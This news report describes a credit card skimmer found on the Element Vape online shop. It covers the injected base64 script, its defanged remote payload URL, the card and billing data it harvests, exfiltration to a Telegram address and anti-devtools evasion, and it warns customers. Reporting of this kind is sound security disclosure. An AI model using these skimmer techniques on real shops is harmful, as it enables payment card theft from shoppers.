Element Vape, a popular online vendor of e-cigarettes and vaping kits, is hosting a credit card skimmer on its live website after being hacked. This retailer sells e-cigarettes, vaping equipment, e-liquids, and CBD products in both retail and online stores in the United States and Canada.
The website of Element Vape is loading a malicious JavaScript file from a third-party website that looks to be a credit card stealer. Threat actors who use credit card stealers on eCommerce sites by inserting scripts are known as Magecart.
A mysterious base64-encoded script may be found on lines 45-50 of the HTML source code on several shop webpages, starting with the homepage. The malicious script has been present on ElementVape.com for an unknown amount of time.
According to a Wayback Machine examination of ElementVape.com, this code was missing as of February 5th, 2022, and earlier. As a result, the infection looks to be more recent, having occurred sometime after the date and before today’s discovery. It just retrieves the following JavaScript file from a third-party site when decoded:
//weicowire[.]com/js/jquery/frontend.js
When the above script was decrypted and studied, it was discovered to be gathering customers’ credit card and invoice information during the checkout process. Email address, payment card information, phone number, and billing address (with street and ZIP code) are just a few elements that the script checks for.
The attacker receives this information via an obfuscated, hardcoded Telegram address included in the script. The script also has anti-reverse-engineering capabilities that check if it’s being run in a sandbox or with “devtools” to prevent examination.
It’s unclear how ElementVape.com’s backend code was altered in the first place to allow the malicious script to enter. And this isn’t the first time that Element Vape’s security has been breached.
Element Vape was alerted of the problem through their Zendesk support site, which did not appear to include the malicious script at the time of evaluation.
Because users may be actively buying on the site, disclosing information about this ongoing attack is in the public interest. Doing so will prevent consumers’ financial information from being stolen. If you have recently made purchases on the website, check your credit card transactions for any unusual behavior.